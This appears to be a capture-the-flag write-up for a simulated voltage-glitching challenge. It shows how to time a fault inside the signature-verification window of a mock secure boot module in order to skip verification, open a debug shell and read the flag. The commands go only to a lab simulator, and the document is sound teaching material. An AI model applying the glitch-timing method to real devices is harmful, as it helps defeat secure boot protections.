55 lines
1.1 KiB
Markdown
55 lines
1.1 KiB
Markdown
# Glitch The Wired — Solution
|
|
|
|
## Overview
|
|
|
|
Simulated voltage glitching attack on a WIRED-MED secure boot module. The goal is to inject a fault during the signature verification phase to bypass it and access the debug console.
|
|
|
|
## Steps
|
|
|
|
1. Connect to the glitch lab:
|
|
|
|
```bash
|
|
nc <host> 3700
|
|
```
|
|
|
|
2. Observe the boot sequence:
|
|
|
|
```
|
|
observe
|
|
```
|
|
|
|
Note the cycle ranges — SIG_VERIFY runs at cycles 3200-3400.
|
|
|
|
3. Configure glitch parameters:
|
|
|
|
```
|
|
set_delay 3300
|
|
set_width 20
|
|
```
|
|
|
|
The delay targets the middle of the SIG_VERIFY window. Width of 10-30 cycles works.
|
|
|
|
4. Arm and trigger:
|
|
|
|
```
|
|
arm
|
|
trigger
|
|
```
|
|
|
|
If successful, the boot log shows "SIG_VERIFY ....... SKIPPED" and a debug shell activates.
|
|
|
|
5. Read the debug console:
|
|
|
|
```
|
|
read_console
|
|
```
|
|
|
|
The flag is in the maintenance token output.
|
|
|
|
## Key Concepts
|
|
|
|
- **Voltage glitching**: Briefly disrupting power supply to cause CPU instruction skips
|
|
- **Secure boot bypass**: Skipping signature verification allows unsigned code to run
|
|
- **Timing precision**: The glitch must overlap with the target operation's execution window
|
|
- **Width matters**: Too short = transient recovery, too wide = brown-out crash
|